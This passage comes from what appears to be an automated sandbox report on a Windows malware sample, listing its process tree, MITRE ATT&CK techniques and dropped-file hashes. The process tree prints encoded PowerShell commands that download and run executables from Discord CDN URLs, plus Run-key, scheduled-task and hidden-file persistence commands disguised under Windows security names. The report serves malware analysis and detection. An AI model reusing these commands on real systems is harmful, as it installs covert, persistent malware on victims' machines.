IAdgBpAGMALgBlAHgAZQAnACkAPAAjAHkAeABsACMAPgA="
7⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4072

C:\Users\Admin\AppData\Roaming\SecurityHealthServic.exe
"C:\Users\Admin\AppData\Roaming\SecurityHealthServic.exe"
8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2572

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthSeurvic';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthSeurvic' -Value '"C:\Users\Admin\AppData\Roaming\SecurityHealthSeurvic\SecurityHealthSeurvic.exe"' -PropertyType 'String'
9⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:740

C:\Windows\SysWOW64\cmd.exe
"cmd" /C schtasks /create /tn \SecurityHealthSeurvic /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthSeurvic\SecurityHealthSeurvic.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
9⤵
PID:5600

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn \SecurityHealthSeurvic /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthSeurvic\SecurityHealthSeurvic.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
10⤵
- Creates scheduled task(s)
PID:1748

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
9⤵
PID:4592

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
9⤵
PID:1948

C:\Users\Admin\AppData\Roaming\SECURITYHEALTHSERVICE.EXE
"C:\Users\Admin\AppData\Roaming\SECURITYHEALTHSERVICE.EXE"
6⤵
- Executes dropped EXE
- Checks computer location settings
PID:3608

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAZwBjACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA2ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANgAxADUANgAwADIAOQA2ADYAMQAyADgANAAvAFMAZQBjAHUAcgBpAHQAeQBIAGUAYQBsAHQAaABTAGUAdQByAHYAaQBjAGUALgBlAHgAZQAnACwAIAA8ACMAdABjAG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB3AHMAcwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBmAHMAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwBlAHIAdgBpAGMAZQAuAGUAeABlACcAKQApADwAIwBnAHAAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBlAHIAZgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAeAB5AHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBlAGMAdQByAGkAdAB5AEgAZQBhAGwAdABoAFMAZQByAHYAaQBjAGUALgBlAHgAZQAnACkAPAAjAHkAcgBsACMAPgA="
7⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2904

C:\Users\Admin\AppData\Roaming\SecurityHealthService.exe
"C:\Users\Admin\AppData\Roaming\SecurityHealthService.exe"
8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:5816

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
9⤵
PID:5548

C:\Users\Admin\AppData\Roaming\S500UBNAN.EXE
"C:\Users\Admin\AppData\Roaming\S500UBNAN.EXE"
6⤵
PID:2484

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAawBmACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA4ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANgA3ADkAOAA1ADcAMQA4ADYANAAxADMANAAvAHUAYgBuAGEAbgAuAGUAeABlACcALAAgADwAIwBzAGgAagAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHQAZgBnACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGUAegBnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMANQAwADAAdQBiAG4AYQBuAC4AZQB4AGUAJwApACkAPAAjAHkAbgBsACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHIAdABmACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB4AGwAZQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTADUAMAAwAHUAYgBuAGEAbgAuAGUAeABlACcAKQA8ACMAcwBoAHcAIwA+AA=="
7⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1852

C:\Users\Admin\AppData\Roaming\S500ubnan.exe
"C:\Users\Admin\AppData\Roaming\S500ubnan.exe"
8⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5848

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC DAILY /TN SecurityHealthHacker /tr C:\Users\Admin\AppData\Roaming\SecurityHealthHacker\SecurityHealthHacker.exe
9⤵
- Creates scheduled task(s)
PID:1660

C:\Windows\System32\attrib.exe
"C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\SecurityHealthHacker"
9⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4064

C:\Windows\System32\attrib.exe
"C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\SecurityHealthHacker\SecurityHealthHacker.exe"
9⤵
- Sets file to hidden
- Views/modifies file attributes
PID:5340

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpBFE0.tmp.bat""
9⤵
PID:3488

C:\Windows\system32\timeout.exe
timeout 3
10⤵
- Delays execution with timeout.exe
PID:5716

C:\Users\Admin\AppData\Roaming\WINDOWSDEFENDERSMART.EXE
"C:\Users\Admin\AppData\Roaming\WINDOWSDEFENDERSMART.EXE"
6⤵
- Executes dropped EXE
- Checks computer location settings
PID:224

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAYgB0ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA3ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANgA0ADIAOQAyADUANQAwADEAMgA0ADUAMgAvAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByAFMAbQBhAHIAdAAuAGUAeABlACcALAAgADwAIwBiAGIAegAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGoAbgBqACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGgAaQBjACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByAFMAbQBhAHIAdAAuAGUAeABlACcAKQApADwAIwBlAGsAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB3AHAAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAbABwAGcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVwBpAG4AZABvAHcAcwBEAGUAZgBlAG4AZABlAHIAUwBtAGEAcgB0AC4AZQB4AGUAJwApADwAIwBwAGoAdgAjAD4A"
7⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5240

C:\Users\Admin\AppData\Roaming\WindowsDefenderSmart.exe
"C:\Users\Admin\AppData\Roaming\WindowsDefenderSmart.exe"
8⤵
- Executes dropped EXE
PID:2004

C:\Users\Admin\AppData\Roaming\WINDOWSPROTECT.EXE
"C:\Users\Admin\AppData\Roaming\WINDOWSPROTECT.EXE"
6⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:60

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AYgB2ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADEAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAAyADcAMQA5ADUAMgA5ADIAOAA4ADMAMwA3ADAAMAAzADQALwAxADAAMwAwADgAOAA3ADQAOAAwADYANAA1ADMAOAA2ADMANgAxAC8AVwBpAG4AZABvAHcAcwBQAHIAbwB0AGUAYwB0AC4AZQB4AGUAJwAsACAAPAAjAGcAawBzACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdQBiAHYAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwBzAHcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVwBpAG4AZABvAHcAcwBQAHIAbwB0AGUAYwB0AC4AZQB4AGUAJwApACkAPAAjAGIAYwBzACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHEAdQBrACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB5AGsAYgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBXAGkAbgBkAG8AdwBzAFAAcgBvAHQAZQBjAHQALgBlAHgAZQAnACkAPAAjAGwAbgBlACMAPgA="
7⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5224

C:\Users\Admin\AppData\Roaming\WindowsProtect.exe
"C:\Users\Admin\AppData\Roaming\WindowsProtect.exe"
8⤵
PID:792

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WindowsProtect';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WindowsProtect' -Value '"C:\Users\Admin\AppData\Roaming\WindowsProtect\WindowsProtect.exe"' -PropertyType 'String'
9⤵
PID:2444

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
9⤵
PID:620

C:\Windows\SysWOW64\cmd.exe
"cmd" /C schtasks /create /tn \WindowsProtect /tr "C:\Users\Admin\AppData\Roaming\WindowsProtect\WindowsProtect.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
9⤵
PID:1128

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3128 -ip 3128
1⤵
PID:1384

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Hidden Files and Directories

T1158

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
Filesize
471B

MD5
df08ee6338ea21249c086d137a7c8e8a

SHA1
8c84963709f58c0959a41069088b18a44d9b1935

SHA256
e56f9839411b377c8ed9627188f1e88e42434e0bf24084f7c0eebb714a1e50b7

SHA512
851d4aa3b218ee83e9e601baca06c1ee2457d278d05b303120411db000dc7b3b0ea9a06e9744063dd7692002dc35f537f86f5563e456cc650d50dc733bccdc36

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
Filesize
434B

MD5
061dff3190028b89997e1528ca213fca

SHA1
668ab860d44f13b491098225785aa0b0fd111910

SHA256
b4443f0ddb6961dffe1ce0277932333cebb2a8b8736fe325c1b1cf6416740183

SHA512
7def7bb60ac945c3f1a1618970704033c1472ef12a6f07474b1e8c07a70dedb98580e27459c919695c35b055839573c8ff2dc09016b1558de7afeb54c69a79c2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\S500ubnan.exe.log
Filesize
226B

MD5
28d7fcc2b910da5e67ebb99451a5f598

SHA1
a5bf77a53eda1208f4f37d09d82da0b9915a6747

SHA256
2391511d0a66ed9f84ae54254f51c09e43be01ad685db80da3201ec880abd49c

SHA512
2d8eb65cbf04ca506f4ef3b9ae13ccf05ebefab702269ba70ffd1ce9e6c615db0a3ee3ac0e81a06f546fc3250b7b76155dd51241c41b507a441b658c8e761df6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log
Filesize
425B

MD5
4eaca4566b22b01cd3bc115b9b0b2196

SHA1
e743e0792c19f71740416e7b3c061d9f1336bf94

SHA256
34ba0ab8d1850e7825763f413142a333ccbc05fa2b5499a28a7d27b8a1c5b4bb

SHA512
bc2b1bf45203e3bb3009a7d37617b8f0f7ffa613680b32de2b963e39d2cf1650614d7035a0cf78f35a4f5cb17a2a439e2e07deaefd2a4275a62efd0a5c0184a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
9faf6f9cd1992cdebfd8e34b48ea9330

SHA1
ae792d2551c6b4ad5f3fa5585c0b0d911c9f868e

SHA256
0c45700b2e83b229e25383569b85ddc0107450c43443a11633b53daf1aaed953

SHA512
05b34627f348b2973455691bcb7131e4a5236cfece653d22432746ccd14d211b9b279f0913fbd7bb150f00eb2f2c872f4f5518f3903e024699fd23c50d679e97

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\dqptnfu\imagestore.dat
Filesize
1KB

MD5
fbce6b857511993fdb9a07293c17b8d7

SHA1
8a579c9a2fa653bd6f98f6263e62ae3b9b6097d8

SHA256
de44b873006cad5ebb48d680da9a33184a5a744f6d026fb45bd8fcc4de28a8e2

SHA512
8e0fdaba5c285d5f81ae5f3b28673a99777a835e9f77689852a8976e08d511aa6da3bc368ab4536e6ad695a06f8440d04e8b2d963fe0429e4d07d81ad23fbadc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\26HZJLHZ\BitecoinPaymentApi‮nls.scr
Filesize
305KB

MD5
b28a3a496bb68f9c4308ee7d888e7a27

SHA1
7cca1a10272b84abf7da155f913a301533ffd2c4

SHA256
985eb402fa66d0ab3594346f7fc61acc0cf0ee8449a5e66d387b9edfaed7e0d9

SHA512
e8b4e5f831a1db67da48175a4a5b22ec7adbe345794979b52fb90ac74c51bcaa8ce6cf80ba8518caa9b3e2bfb330e95d941075bb728bdafefa6c6b54c13847a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\26HZJLHZ\BitecoinPaymentApi‮nls.scr.vzwiurj.partial
Filesize
305KB

MD5
b28a3a496bb68f9c4308ee7d888e7a27

SHA1
7cca1a10272b84abf7da155f913a301533ffd2c4

SHA256
985eb402fa66d0ab3594346f7fc61acc0cf0ee8449a5e66d387b9edfaed7e0d9

SHA512
e8b4e5f831a1db67da48175a4a5b22ec7adbe345794979b52fb90ac74c51bcaa8ce6cf80ba8518caa9b3e2bfb330e95d941075bb728bdafefa6c6b54c13847a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
ec484f5eba2f29de745101dfa991b523

SHA1
7c21ecc9206a1a9162f399a6034881f45947b340

SHA256
a64ce3f37231c19aed671a3f57c9be4faf8980fd9aff3c683fa3565abdcdedc2

SHA512
564252e7a8d5f95b8e047d9469b11ef45074a102a10fc20a22df1b7aabf089015854b632dbf6a62d3176b5543dc9cf11d66418b71220535207211569a38c9d32

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
ec484f5eba2f29de745101dfa991b523

SHA1
7c21ecc9206a1a9162f399a6034881f45947b340

SHA256
a64ce3f37231c19aed671a3f57c9be4faf8980fd9aff3c683fa3565abdcdedc2

SHA512
564252e7a8d5f95b8e047d9469b11ef45074a102a10fc20a22df1b7aabf089015854b632dbf6a62d3176b5543dc9cf11d66418b71220535207211569a38c9d32

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
00e58f368649eca5caa1a16e72386a57

SHA1
1c5e0dc46d6bba4ddd8e3ce4e2aca83950434635

SHA256
c4c309d45ade44494c6f586774623c99621a7cda17a743aa0ba82a23850ccba7

SHA512
37bcc4171624838457d146b21157eb2771d94637a3b89f57ab2fcf9be10baff16ef9fc97cf77fb6bf9490806561be5c36c3ab52553cd57d9d872d26e89defaa0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
1ac91b5cbaee1716597f815b59fc04d6

SHA1
06a81b1c3f692d18b9b8a2ac396beef5db89da4f

SHA256
5eab192250ef11a9c0c8dcc67101290a7dd6c56eaca4f0c937a90e5dbd115ecb

SHA512
d8190b750758928bf0459237306cf175385c0c2f3d633ab2bffe1f4a3b5d90d59412d9ed57f45ffeb071b3a2fb601606c02432f4fcff9bdb3b0dd74dbb929ccb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
1ac91b5cbaee1716597f815b59fc04d6

SHA1
06a81b1c3f692d18b9b8a2ac396beef5db89da4f

SHA256
5eab192250ef11a9c0c8dcc67101290a7dd6c56eaca4f0c937a90e5dbd115ecb

SHA512
d8190b750758928bf0459237306cf175385c0c2f3d633ab2bffe1f4a3b5d90d59412d9ed57f45ffeb071b3a2fb601606c02432f4fcff9bdb3b0dd74dbb929ccb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
33e9dd1bc41e70c4fbdf04b85cf36ff4

SHA1
0433625fae735abc2f11249456e212dfca1473a9

SHA256
f11191abae782730f3e16400aef46c9e8404c2608dc132ec646b41e7f07911f9

SHA512
d74083d2f0e7fe21db55c7c0bc880dd2d1fe92ca806c79f77ec0bbc7d2ae5fd1d3509d2ebd0fa60efbab0688711902b7a1da6419aba94a0897810ccf6d9957df

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
ec484f5eba2f29de745101dfa991b523

SHA1
7c21ecc9206a1a9162f399a6034881f45947b340

SHA256
a64ce3f37231c19aed671a3f57c9be4faf8980fd9aff3c683fa3565abdcdedc2

SHA512
564252e7a8d5f95b8e047d9469b11ef45074a102a10fc20a22df1b7aabf089015854b632dbf6a62d3176b5543dc9cf11d66418b71220535207211569a38c9d32

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
ec484f5eba2f29de745101dfa991b523

SHA1
7c21ecc9206a1a9162f399a6034881f45947b340

SHA256
a64ce3f37231c19aed671a3f57c9be4faf8980fd9aff3c683fa3565abdcdedc2

SHA512
564252e7a8d5f95b8e047d9469b11ef45074a102a10fc20a22df1b7aabf089015854b632dbf6a62d3176b5543dc9cf11d66418b71220535207211569a38c9d32

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
ec484f5eba2f29de745101dfa991b523

SHA1
7c21ecc9206a1a9162f399a6034881f45947b340

SHA256
a64ce3f37231c19aed671a3f57c9be4faf8980fd9aff3c683fa3565abdcdedc2

SHA512
564252e7a8d5f95b8e047d9469b11ef45074a102a10fc20a22df1b7aabf089015854b632dbf6a62d3176b5543dc9cf11d66418b71220535207211569a38c9d32

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
b6500224947206fab25690397fca489e

SHA1
8f61dd35d00c5dcc990fb2840982841545b2d953

SHA256
846cfb9b39e1690ee4146c9cfa9d791c3a42c72c4ae547a07b3ff8f0f5d1865b

SHA512
aa4775f7c905c3543632d7d49703ff744a10be5a22097d358629666f42b20873ad063ec24d54e65de731b6830cf4bbe365121f43040dbb209b27c01ffbad8112

Download Submit
C:\Users\Admin\AppData\Roaming\DEFENDERRUNTIME.EXE
Filesize
7KB

MD5
d410fc60a0465460f930f09232468e60

SHA1
7803d0e6a152614f5f9e3a864d5abf7f3b914436

SHA256
bb38563f30154213f91e72911b474eeded401a5460a88c334365f8700df9d698

SHA512
b0979bb034007430996bc48b866eafe586b1d609564fdb4fbd8fcf54854750c9943fe8abd407a42fe4bbf03bd40df70249f06f88f1d9ed32ab6f7765333542b0

Download Submit
C:\Users\Admin\AppData\Roaming\DEFENDERRUNTIME.EXE
Filesize
7KB

MD5
d410fc60a0465460f930f09232468e60

SHA1
7803d0e6a152614f5f9e3a864d5abf7f3b914436

SHA256
bb38563f30154213f91e72911b474eeded401a5460a88c334365f8700df9d698

SHA512
b0979bb034007430996bc48b866eafe586b1d609564fdb4fbd8fcf54854750c9943fe8abd407a42fe4bbf03bd40df70249f06f88f1d9ed32ab6f7765333542b0

Download Submit
C:\Users\Admin\AppData\Roaming\DEFENDERRUNTIME.EXE
Filesize
4.2MB

MD5
3332abfdd1f4dba906b4a945f5e77478

SHA1
5904ca456fa339f8f5d398fe95f40d40c369294f

SHA256
ea6e505198115ff353bda1976aee2a87011a136e6765d08c817b0a0a63fdcd6a

SHA512
51ba014bed14d53ae98f2f0d80e92187b1b3a19231374683f274de8498e533e5d8f222710decc05efbdc7693eb75c0825ac4434545c6c767f276c3581a948b45

Download Submit
C:\Users\Admin\AppData\Roaming\DEFENDERRUNTIMEE.EXE
Filesize
7KB

MD5
86d8c840abf82333ea4ec7a1cc581150

SHA1
92ed26c8382f0e0377800dcf09db7431c87bc193

SHA256
d3d3b0cffd848bdbcb9c24200cfb520b1f84adf65b2f0bbd941289f1edad8885

SHA512
ebbde01b0666a741a43892780aa8d33cac1c6e582d83e29903efd1b55499b56f960920b88d67bbcc90261e63d0a560fe228e07c7e1f15600bf57344d3725d286

Download Submit
C:\Users\Admin\AppData\Roaming\DEFENDERRUNTIMEE.EXE
Filesize
7KB

MD5
86d8c840abf82333ea4ec7a1cc581150

SHA1
92ed26c8382f0e0377800dcf09db7431c87bc193

SHA256
d3d3b0cffd848bdbcb9c24200cfb520b1f84adf65b2f0bbd941289f1edad8885

SHA512
ebbde01b0666a741a43892780aa8d33cac1c6e582d83e29903efd1b55499b56f960920b88d67bbcc90261e63d0a560fe228e07c7e1f15600bf57344d3725d286

Download Submit
C:\Users\Admin\AppData\Roaming\DEFENDERRUNTIMEE.EXE
Filesize
14.7MB

MD5
34517eb8c56478167db389ed032837e4

SHA1
bc66c8b96050e5ac26363329061d4e82e89fe87a

SHA256
00484b0e3a15612e2ad0029dd0f5242a77fca73529d35a44f1dbca965f292152

SHA512
6055838840004bacaf1c3912e414477e895d2cf40ac5578404e5cf27d15df408c4fdae824d73522e3780421aee3e50e5a37481eb7ecad24d89011082f3641fa8

Download Submit
C:\Users\Admin\AppData\Roaming\DefenderRuntime.exe
Filesize
4.2MB

MD5
3332abfdd1f4dba906b4a945f5e77478

SHA1
5904ca456fa339f8f5d398fe95f40d40c369294f

SHA256
ea6e505198115ff353bda1976aee2a87011a136e6765d08c817b0a0a63fdcd6a

SHA512
51ba014bed14d53ae98f2f0d80e92187b1b3a19231374683f274de8498e533e5d8f222710decc05efbdc7693eb75c0825ac4434545c6c767f276c3581a948b45

Download Submit
C:\Users\Admin\AppData\Roaming\DefenderRuntimee.exe
Filesize
14.7MB

MD5
34517eb8c56478167db389ed032837e4

SHA1
bc66c8b96050e5ac26363329061d4e82e89fe87a

SHA256
00484b0e3a15612e2ad0029dd0f5242a77fca73529d35a44f1dbca965f292152

SHA512
6055838840004bacaf1c3912e414477e895d2cf40ac5578404e5cf27d15df408c4fdae824d73522e3780421aee3e50e5a37481eb7ecad24d89011082f3641fa8

Download Submit
C:\Users\Admin\AppData\Roaming\FILEMANAGE.EXE
Filesize
7KB

MD5
048f1c0ada5aea3f7d53c19f0da9fd86

SHA1
ec20a946d901b410a712e1ce4c37ec8f40e40c7c

SHA256
1178eada4d51346cb5107c593cf09a84cefbceac7fc454c9de447df7f8f8b01e

SHA512
c730cf85d77f0604c2bb487eb6d2f4dd992a351aac45ede5d35fbf77b658c573a40304fabea321a1fbde9205b75173b4afb7b8f212c12aa6452c8992926b1379

Download Submit
C:\Users\Admin\AppData\Roaming\FILEMANAGE.EXE
Filesize
7KB

MD5
048f1c0ada5aea3f7d53c19f0da9fd86

SHA1
